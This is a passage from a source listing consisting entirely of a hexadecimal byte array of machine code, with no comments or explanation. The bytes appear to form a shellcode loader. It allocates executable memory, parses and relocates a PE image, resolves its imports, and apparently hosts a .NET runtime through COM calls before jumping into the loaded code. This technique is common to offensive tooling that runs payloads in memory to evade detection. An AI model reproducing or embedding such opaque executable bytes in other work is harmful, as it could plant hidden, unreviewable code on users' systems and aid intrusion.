329 | 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x83, 0x4c, 0x04, 0x00, 0x00, 0x50, | |
330 | 0x51, 0xff, 0x52, 0x24, 0x33, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x33, 0x01, | |
331 | 0x00, 0x00, 0x8b, 0x46, 0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, | |
332 | 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00, 0x00, 0x8d, 0x85, 0x04, 0x02, 0x00, | |
333 | 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0x56, 0x08, 0x8b, 0xf8, 0x8d, 0x46, | |
334 | 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x0a, 0x57, 0x52, 0x89, 0x44, 0x24, 0x28, | |
335 | 0xff, 0x51, 0x30, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x85, 0xf6, 0x0f, | |
336 | 0x88, 0xd7, 0x00, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x18, 0x8b, 0x74, 0x24, | |
337 | 0x2c, 0x8b, 0x12, 0x8d, 0x46, 0x10, 0x50, 0x8d, 0x83, 0x6c, 0x04, 0x00, | |
338 | 0x00, 0x8b, 0x0a, 0x50, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f, 0x88, 0xb5, | |
339 | 0x00, 0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x8b, 0x85, 0x10, 0x19, | |
340 | 0x00, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c, 0x50, 0x6a, | |
341 | 0x01, 0x6a, 0x11, 0xff, 0x53, 0x58, 0x8b, 0xf8, 0x85, 0xff, 0x0f, 0x84, | |
342 | 0x90, 0x00, 0x00, 0x00, 0x8b, 0x57, 0x0c, 0x33, 0xc0, 0x8b, 0xc8, 0x39, | |
343 | 0x85, 0x14, 0x19, 0x00, 0x00, 0x72, 0x2d, 0x77, 0x08, 0x39, 0x85, 0x10, | |
344 | 0x19, 0x00, 0x00, 0x76, 0x23, 0x33, 0xdb, 0x8a, 0x84, 0x29, 0x18, 0x19, | |
345 | 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x9d, 0x14, 0x19, 0x00, 0x00, | |
346 | 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3, | |
347 | 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0x4e, 0x10, 0x8d, 0x46, 0x14, 0x50, 0x57, | |
348 | 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b, | |
349 | 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x47, | |
350 | 0x0c, 0x39, 0x95, 0x14, 0x19, 0x00, 0x00, 0x72, 0x27, 0x77, 0x08, 0x39, | |
351 | 0x95, 0x10, 0x19, 0x00, 0x00, 0x76, 0x1d, 0x88, 0x94, 0x29, 0x18, 0x19, | |
352 | 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x95, 0x14, 0x19, 0x00, 0x00, | |
353 | 0x72, 0xed, 0x77, 0x08, 0x3b, 0x8d, 0x10, 0x19, 0x00, 0x00, 0x72, 0xe3, | |
354 | 0x57, 0xff, 0x53, 0x64, 0x8b, 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b, | |
355 | 0x83, 0xc4, 0x14, 0xc3, 0x83, 0x27, 0x00, 0xe9, 0xcc, 0xfe, 0xff, 0xff, | |
356 | 0x89, 0x3e, 0xe9, 0xc7, 0xfe, 0xff, 0xff, 0x33, 0xff, 0x8d, 0x46, 0x08, | |
357 | 0x50, 0x8d, 0x83, 0x5c, 0x04, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x4c, 0x04, | |
358 | 0x00, 0x00, 0x50, 0x57, 0x57, 0xff, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x85, | |
359 | 0xc0, 0x0f, 0x89, 0xab, 0xfe, 0xff, 0xff, 0x89, 0x7e, 0x08, 0x33, 0xc0, | |
360 | 0xeb, 0xbe, 0x83, 0xec, 0x6c, 0x53, 0x8b, 0x5c, 0x24, 0x74, 0x33, 0xc0, | |
361 | 0x55, 0x56, 0x57, 0x8d, 0x7c, 0x24, 0x3c, 0x33, 0xed, 0x21, 0x6c, 0x24, | |
362 | 0x14, 0x8d, 0xb3, 0x48, 0x07, 0x00, 0x00, 0xab, 0xab, 0xab, 0xab, 0x33, | |
363 | 0xc0, 0x66, 0x89, 0x44, 0x24, 0x10, 0x40, 0x39, 0x83, 0x0c, 0x05, 0x00, | |
364 | 0x00, 0x74, 0x02, 0x8b, 0x36, 0x83, 0x3e, 0x02, 0x0f, 0x85, 0x64, 0x01, | |
365 | 0x00, 0x00, 0x8b, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x48, 0x14, | |
366 | 0x8d, 0x78, 0x1c, 0x57, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0, | |
367 | 0x0f, 0x88, 0x41, 0x01, 0x00, 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x14, | |
368 | 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0x4e, | |
369 | 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x6a, 0x01, 0xff, 0x74, | |
370 | 0x24, 0x1c, 0xff, 0x53, 0x68, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x6a, 0x01, | |
371 | 0xff, 0x74, 0x24, 0x1c, 0xff, 0x53, 0x6c, 0x8b, 0x44, 0x24, 0x20, 0x2b, | |
372 | 0x44, 0x24, 0x24, 0x83, 0xc0, 0x01, 0x0f, 0x84, 0xbc, 0x00, 0x00, 0x00, | |
373 | 0x6a, 0x01, 0x6a, 0x00, 0x6a, 0x0c, 0xff, 0x53, 0x5c, 0x8b, 0xe8, 0x33, | |
374 | 0xc9, 0x39, 0x8e, 0x04, 0x08, 0x00, 0x00, 0xb8, 0x08, 0x20, 0x00, 0x00, | |
375 | 0x66, 0x89, 0x44, 0x24, 0x2c, 0x74, 0x58, 0xff, 0xb6, 0x04, 0x08, 0x00, | |
376 | 0x00, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x89, 0x44, 0x24, 0x34, 0x33, | |
377 | 0xc0, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x39, 0x86, 0x04, 0x08, | |
378 | 0x00, 0x00, 0x76, 0x63, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, | |
379 | 0x03, 0xc6, 0x50, 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, | |
380 | 0x00, 0x00, 0x50, 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x8b, 0x84, | |
381 | 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, | |
382 | 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xcb, 0xeb, 0x2c, 0x6a, | |
383 | 0x01, 0x51, 0x6a, 0x08, 0xff, 0x53, 0x5c, 0x83, 0xa4, 0x24, 0x80, 0x00, | |
384 | 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x34, 0x8d, 0x44, 0x24, 0x10, 0x50, | |
385 | 0xff, 0x53, 0x70, 0x50, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, | |
386 | 0xff, 0x74, 0x24, 0x3c, 0xff, 0x53, 0x60, 0x83, 0xa4, 0x24, 0x80, 0x00, | |
387 | 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x8d, 0x84, 0x24, 0x84, | |
388 | 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x83, 0x64, 0x24, 0x44, | |
389 | 0x00, 0x8d, 0x54, 0x24, 0x5c, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x40, | |
390 | 0x40, 0x66, 0x89, 0x44, 0x24, 0x40, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10, | |
391 | 0x8b, 0xfc, 0x8b, 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94, | |
392 | 0x00, 0x00, 0x00, 0x85, 0xed, 0x0f, 0x84, 0x32, 0x01, 0x00, 0x00, 0xff, | |
393 | 0x74, 0x24, 0x34, 0xff, 0x53, 0x64, 0x55, 0xff, 0x53, 0x64, 0xe9, 0x22, | |
394 | 0x01, 0x00, 0x00, 0x21, 0x2f, 0xe9, 0x1b, 0x01, 0x00, 0x00, 0x8d, 0x86, | |
395 | 0x04, 0x04, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x89, 0x6c, | |
396 | 0x24, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x86, | |
397 | 0x04, 0x06, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x89, 0x44, 0x24, 0x1c, | |
398 | 0x85, 0xc0, 0x0f, 0x84, 0xe9, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x84, | |
399 | 0x00, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52, | |
400 | 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x34, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85, | |
401 | 0xff, 0x0f, 0x88, 0xbe, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x04, 0x08, 0x00, | |
402 | 0x00, 0x33, 0xed, 0x85, 0xc0, 0x74, 0x6e, 0x50, 0x55, 0x6a, 0x0c, 0xff, | |
403 | 0x53, 0x5c, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x61, 0x83, 0xa4, 0x24, 0x80, | |
404 | 0x00, 0x00, 0x00, 0x00, 0x83, 0xbe, 0x04, 0x08, 0x00, 0x00, 0x00, 0x76, | |
405 | 0x50, 0x33, 0xc0, 0xc1, 0xe0, 0x09, 0x05, 0x08, 0x08, 0x00, 0x00, 0x03, | |
406 | 0xc6, 0x50, 0xff, 0x53, 0x70, 0x6a, 0x08, 0x89, 0x44, 0x24, 0x58, 0x58, | |
407 | 0x66, 0x89, 0x44, 0x24, 0x4c, 0x8d, 0x44, 0x24, 0x4c, 0x50, 0x8d, 0x84, | |
408 | 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x53, 0x60, 0x8b, 0xf8, | |
409 | 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x64, 0x33, 0xed, 0x8b, 0x84, | |
410 | 0x24, 0x80, 0x00, 0x00, 0x00, 0x40, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, | |
411 | 0x00, 0x3b, 0x86, 0x04, 0x08, 0x00, 0x00, 0x72, 0xb2, 0x85, 0xff, 0x78, | |
412 | 0x3c, 0x8b, 0x44, 0x24, 0x28, 0x8d, 0x54, 0x24, 0x6c, 0x52, 0x55, 0x83, | |
413 | 0xec, 0x10, 0x8d, 0x74, 0x24, 0x54, 0x8b, 0x00, 0x8b, 0xfc, 0x6a, 0x00, | |
414 | 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00, 0x00, 0xa5, 0xa5, 0xa5, 0x8b, | |
415 | 0x74, 0x24, 0x3c, 0x56, 0x50, 0xff, 0x91, 0xe4, 0x00, 0x00, 0x00, 0x85, | |
416 | 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x64, 0x8b, 0x6c, 0x24, 0x18, 0xeb, | |
417 | 0x08, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x74, 0x24, 0x1c, 0x56, 0xff, 0x53, | |
418 | 0x74, 0x55, 0xff, 0x53, 0x74, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, | |
419 | 0x83, 0xc4, 0x6c, 0xc3, 0x81, 0xec, 0xdc, 0x00, 0x00, 0x00, 0xb8, 0x01, | |
420 | 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x31, 0xc0, 0x48, 0x79, 0x53, | |
421 | 0x55, 0x8b, 0xac, 0x24, 0xe8, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x4c, | |
422 | 0x89, 0x44, 0x24, 0x54, 0x89, 0x44, 0x24, 0x5c, 0x83, 0xbd, 0x0c, 0x05, | |
423 | 0x00, 0x00, 0x01, 0x89, 0x44, 0x24, 0x64, 0x89, 0x44, 0x24, 0x6c, 0x89, | |
424 | 0x84, 0x24, 0xa8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xc0, 0x00, 0x00, | |
425 | 0x00, 0x89, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd0, | |
426 | 0x00, 0x00, 0x00, 0x89, 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8d, 0x85, | |
427 | 0x48, 0x07, 0x00, 0x00, 0x57, 0xc7, 0x44, 0x24, 0x30, 0x1b, 0x8b, 0x44, | |
428 | 0x24, 0xc7, 0x44, 0x24, 0x34, 0x04, 0x8b, 0x4c, 0x24, 0xc7, 0x44, 0x24, | |
429 | 0x38, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x44, 0x24, 0x3c, 0x0c, 0x52, 0x81, | |
430 | 0xc2, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, | |
431 | 0x44, 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x44, 0x24, 0x48, 0xf4, 0xff, 0xd0, | |
432 | 0xc3, 0xc7, 0x44, 0x24, 0x4c, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x44, 0x24, | |
433 | 0x54, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x5c, 0x89, 0x9c, 0x24, | |
434 | 0x38, 0xc7, 0x44, 0x24, 0x64, 0x89, 0xbc, 0x24, 0x20, 0xc7, 0x44, 0x24, | |
435 | 0x6c, 0x89, 0xb4, 0x24, 0x28, 0xc7, 0x44, 0x24, 0x74, 0x89, 0xe6, 0x48, | |
436 | 0x89, 0xc7, 0x44, 0x24, 0x78, 0xcf, 0xb8, 0x00, 0x02, 0xc7, 0x44, 0x24, | |
437 | 0x7c, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, | |
438 | 0xc1, 0x48, 0x8d, 0x14, 0xc7, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x01, | |
439 | 0x4c, 0x8d, 0x04, 0xc7, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x02, 0x4d, | |
440 | 0x8d, 0x0c, 0xc7, 0x84, 0x24, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x49, 0x8d, | |
441 | 0x1c, 0xc7, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x01, 0x48, 0x89, 0x9c, | |
442 | 0xc7, 0x84, 0x24, 0x94, 0x00, 0x00, 0x00, 0x24, 0x00, 0x01, 0x00, 0xc7, | |
443 | 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x84, | |
444 | 0x24, 0x9c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9c, 0x24, 0xc7, 0x84, 0x24, | |
445 | 0xa0, 0x00, 0x00, 0x00, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x84, 0x24, 0xa4, | |
446 | 0x00, 0x00, 0x00, 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x84, 0x24, 0xa8, 0x00, | |
447 | 0x00, 0x00, 0x89, 0x9c, 0x24, 0x10, 0xc7, 0x84, 0x24, 0xb0, 0x00, 0x00, | |
448 | 0x00, 0x01, 0xc3, 0x48, 0x89, 0xc7, 0x84, 0x24, 0xb4, 0x00, 0x00, 0x00, | |
449 | 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00, 0x00, | |
450 | 0x00, 0xff, 0xd7, 0xc7, 0x84, 0x24, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, | |
451 | 0xf4, 0x48, 0xc7, 0x84, 0x24, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xb4, 0x24, | |
452 | 0x28, 0xc7, 0x84, 0x24, 0xc8, 0x00, 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x20, | |
453 | 0xc7, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x38, 0xc7, | |
454 | 0x84, 0x24, 0xd8, 0x00, 0x00, 0x00, 0x8b, 0xac, 0x24, 0x30, 0xc7, 0x84, | |
455 | 0x24, 0xe0, 0x00, 0x00, 0x00, 0x81, 0xc4, 0x48, 0x01, 0xc7, 0x84, 0x24, | |
456 | 0xe4, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc3, 0x00, 0x89, 0x44, 0x24, 0x14, | |
457 | 0x74, 0x06, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x14, 0x8b, 0xb8, 0x54, 0x19, | |
458 | 0x00, 0x00, 0x05, 0x18, 0x19, 0x00, 0x00, 0x03, 0xf8, 0x89, 0x44, 0x24, | |
459 | 0x10, 0x33, 0xdb, 0x89, 0x7c, 0x24, 0x18, 0x53, 0xff, 0x55, 0x38, 0x66, | |
460 | 0x8b, 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b, | |
461 | 0x4c, 0x02, 0x04, 0x0f, 0x85, 0x80, 0x02, 0x00, 0x00, 0x56, 0x6a, 0x40, | |
462 | 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, 0x10, 0x00, 0x00, 0x50, 0x89, | |
463 | 0x44, 0x24, 0x28, 0x8b, 0x47, 0x50, 0x03, 0xc1, 0x50, 0x53, 0xff, 0x55, | |
464 | 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x0f, | |
465 | 0xb7, 0x5f, 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x10, 0x00, 0x83, 0xc3, | |
466 | 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x37, 0x8b, 0x6c, 0x24, 0x14, 0x03, | |
467 | 0xdf, 0xff, 0x73, 0xfc, 0x8b, 0x03, 0x03, 0xc5, 0x50, 0x8b, 0x43, 0xf8, | |
468 | 0x03, 0xc6, 0x50, 0xe8, 0xa1, 0x07, 0x00, 0x00, 0x8b, 0x4c, 0x24, 0x1c, | |
469 | 0x8d, 0x5b, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x83, 0xc4, 0x0c, 0x41, 0x89, | |
470 | 0x4c, 0x24, 0x10, 0x3b, 0xc8, 0x72, 0xd6, 0x8b, 0xac, 0x24, 0xf0, 0x00, | |
471 | 0x00, 0x00, 0x8b, 0x9f, 0x80, 0x00, 0x00, 0x00, 0x03, 0xde, 0x89, 0x5c, | |
472 | 0x24, 0x14, 0x8b, 0x43, 0x0c, 0x85, 0xc0, 0x74, 0x68, 0x03, 0xc6, 0x50, | |
473 | 0xff, 0x55, 0x30, 0x8b, 0x53, 0x10, 0x89, 0x44, 0x24, 0x28, 0x03, 0xd6, | |
474 | 0x8b, 0x03, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x24, 0x89, 0x44, 0x24, 0x10, | |
475 | 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x35, 0x8b, 0x5c, 0x24, 0x28, 0x8b, 0xfa, | |
476 | 0x8b, 0x55, 0x34, 0x85, 0xc9, 0x79, 0x05, 0x0f, 0xb7, 0xc1, 0xeb, 0x05, | |
477 | 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x50, 0x53, 0xff, 0xd2, 0x89, 0x07, 0x83, | |
478 | 0xc7, 0x04, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24, | |
479 | 0x10, 0x8b, 0x08, 0x85, 0xc9, 0x75, 0xd5, 0x8b, 0x5c, 0x24, 0x14, 0x8b, | |
480 | 0x43, 0x20, 0x83, 0xc3, 0x14, 0x89, 0x5c, 0x24, 0x14, 0x85, 0xc0, 0x75, | |
481 | 0x9c, 0x8b, 0x7c, 0x24, 0x1c, 0x8b, 0x9f, 0xa0, 0x00, 0x00, 0x00, 0x8b, | |
482 | 0xc6, 0x2b, 0x47, 0x34, 0x03, 0xde, 0x33, 0xc9, 0x89, 0x44, 0x24, 0x1c, | |
483 | 0x39, 0x0b, 0x74, 0x64, 0x8d, 0x4b, 0x08, 0xeb, 0x49, 0x0f, 0xb7, 0x01, | |
484 | 0x8b, 0xd0, 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x10, 0x66, | |
485 | 0x3b, 0x44, 0x24, 0x20, 0x75, 0x23, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00, | |
486 | 0x00, 0x89, 0x44, 0x24, 0x10, 0x03, 0x03, 0x8b, 0x0c, 0x30, 0x03, 0x4c, | |
487 | 0x24, 0x1c, 0x8b, 0x44, 0x24, 0x10, 0x03, 0x03, 0x89, 0x0c, 0x30, 0x8b, | |
488 | 0x4c, 0x24, 0x14, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b, | |
489 | 0xd0, 0x0f, 0x83, 0x25, 0x01, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x43, | |
490 | 0x04, 0x03, 0xc3, 0x89, 0x4c, 0x24, 0x14, 0x3b, 0xc8, 0x75, 0xaa, 0x83, | |
491 | 0x39, 0x00, 0x8b, 0xd9, 0x75, 0x9e, 0x33, 0xc9, 0x8b, 0x5c, 0x24, 0x18, | |
492 | 0x83, 0x3b, 0x03, 0x0f, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x8d, 0x93, 0x04, | |
493 | 0x06, 0x00, 0x00, 0x66, 0x39, 0x0a, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, | |
494 | 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0xe5, 0x00, 0x00, 0x00, 0x8b, | |
495 | 0x7c, 0x31, 0x18, 0x85, 0xff, 0x0f, 0x84, 0xd9, 0x00, 0x00, 0x00, 0x8b, | |
496 | 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x31, | |
497 | 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24, | |
498 | 0x20, 0x8d, 0x04, 0xb8, 0x83, 0xc0, 0xfc, 0x89, 0x44, 0x24, 0x18, 0x8b, | |
499 | 0x00, 0x52, 0x03, 0xc6, 0x50, 0xe8, 0xd8, 0x03, 0x00, 0x00, 0x59, 0x59, | |
500 | 0x85, 0xc0, 0x74, 0x1c, 0x8b, 0x44, 0x24, 0x18, 0x83, 0xe8, 0x04, 0x89, | |
501 | 0x44, 0x24, 0x18, 0x83, 0xef, 0x01, 0x0f, 0x84, 0x90, 0x00, 0x00, 0x00, | |
502 | 0x8d, 0x93, 0x04, 0x06, 0x00, 0x00, 0xeb, 0xd3, 0x8b, 0x44, 0x24, 0x20, | |
503 | 0x8b, 0x4c, 0x24, 0x1c, 0x0f, 0xb7, 0x44, 0x78, 0xfe, 0x8b, 0x04, 0x81, | |
504 | 0x03, 0xc6, 0x89, 0x44, 0x24, 0x20, 0x74, 0x70, 0x6a, 0x40, 0xb8, 0x00, | |
505 | 0x30, 0x00, 0x00, 0x50, 0x68, 0xbc, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x50, | |
506 | 0xff, 0x55, 0x3c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x57, 0x68, 0xbc, 0x00, | |
507 | 0x00, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x57, 0xe8, 0xc8, 0x05, 0x00, | |
508 | 0x00, 0x8d, 0x83, 0x08, 0x08, 0x00, 0x00, 0x50, 0xff, 0xb3, 0x04, 0x08, | |
509 | 0x00, 0x00, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd7, 0x68, 0xbc, 0x00, 0x00, | |
510 | 0x00, 0x33, 0xdb, 0x53, 0x57, 0xe8, 0xcb, 0x05, 0x00, 0x00, 0x83, 0xc4, | |
511 | 0x24, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x53, 0x57, 0xff, 0x55, 0x40, 0xeb, | |
512 | 0x17, 0x8b, 0x47, 0x28, 0x51, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0x03, | |
513 | 0xc6, 0xff, 0xd0, 0xeb, 0x07, 0x8b, 0x47, 0x28, 0x03, 0xc6, 0xff, 0xd0, | |
514 | 0x68, 0x00, 0xc0, 0x00, 0x00, 0x33, 0xc0, 0x50, 0x56, 0xff, 0x55, 0x40, | |
515 | 0x5e, 0x5f, 0x5d, 0x5b, 0x81, 0xc4, 0xdc, 0x00, 0x00, 0x00, 0xc3, 0x81, | |
516 | 0xec, 0xd8, 0x00, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0xe0, 0x00, 0x00, | |
517 | 0x00, 0x55, 0x56, 0x57, 0x83, 0xbb, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, | |
518 | 0xb3, 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x36, 0x8b, 0x83, 0x40, | |
519 | 0x07, 0x00, 0x00, 0x33, 0xff, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, | |
520 | 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0xff, 0x53, 0x3c, | |
521 | 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x8e, | |
522 | 0x10, 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x55, 0x6a, 0xff, 0x8d, 0x8e, | |
523 | 0x18, 0x19, 0x00, 0x00, 0x51, 0x57, 0x57, 0xff, 0x53, 0x50, 0x8d, 0x44, | |
524 | 0x24, 0x44, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x53, | |
525 | 0xe8, 0x4c, 0xea, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x78, 0x89, 0x44, 0x24, | |
526 | 0x2c, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x53, 0xe8, 0xfe, 0xf2, 0xff, 0xff, | |
527 | 0x83, 0xc4, 0x10, 0x89, 0x7c, 0x24, 0x20, 0x57, 0x57, 0xff, 0x93, 0xa8, | |
528 | 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x8d, | |
529 | 0x44, 0x24, 0x10, 0x50, 0x8d, 0x83, 0x9c, 0x04, 0x00, 0x00, 0x50, 0x6a, | |
530 | 0x03, 0x57, 0x8d, 0x83, 0x7c, 0x04, 0x00, 0x00, 0x50, 0xff, 0x93, 0xac, | |
531 | 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xa4, 0x00, 0x00, 0x00, 0x8b, | |
532 | 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x83, 0xbc, 0x04, | |
533 | 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, 0x85, 0xc0, 0x75, 0x77, | |
534 | 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x0c, 0x85, 0xc0, | |
535 | 0x75, 0x5f, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, 0x89, 0x4c, | |
536 | 0x24, 0x30, 0x52, 0x51, 0x8b, 0x01, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x75, | |
537 | 0x48, 0x8d, 0x83, 0xcc, 0x03, 0x00, 0x00, 0x50, 0xff, 0x53, 0x70, 0x8b, | |
538 | 0x4c, 0x24, 0x10, 0x8b, 0xf8, 0x6a, 0x02, 0x57, 0x51, 0x8b, 0x11, 0xff, | |
539 | 0x52, 0x20, 0x57, 0x8b, 0xf0, 0xff, 0x53, 0x74, 0x33, 0xff, 0x85, 0xf6, | |
540 | 0x75, 0x23, 0x8b, 0x44, 0x24, 0x14, 0x57, 0x57, 0x57, 0x8b, 0x08, 0x57, | |
541 | 0x57, 0x57, 0x57, 0x57, 0x55, 0x50, 0xff, 0x51, 0x14, 0x85, 0xc0, 0x75, | |
542 | 0x0c, 0x8b, 0x44, 0x24, 0x10, 0x6a, 0x02, 0x50, 0x8b, 0x08, 0xff, 0x51, | |
543 | 0x14, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, | |
544 | 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x1c, 0x8b, 0x44, 0x24, | |
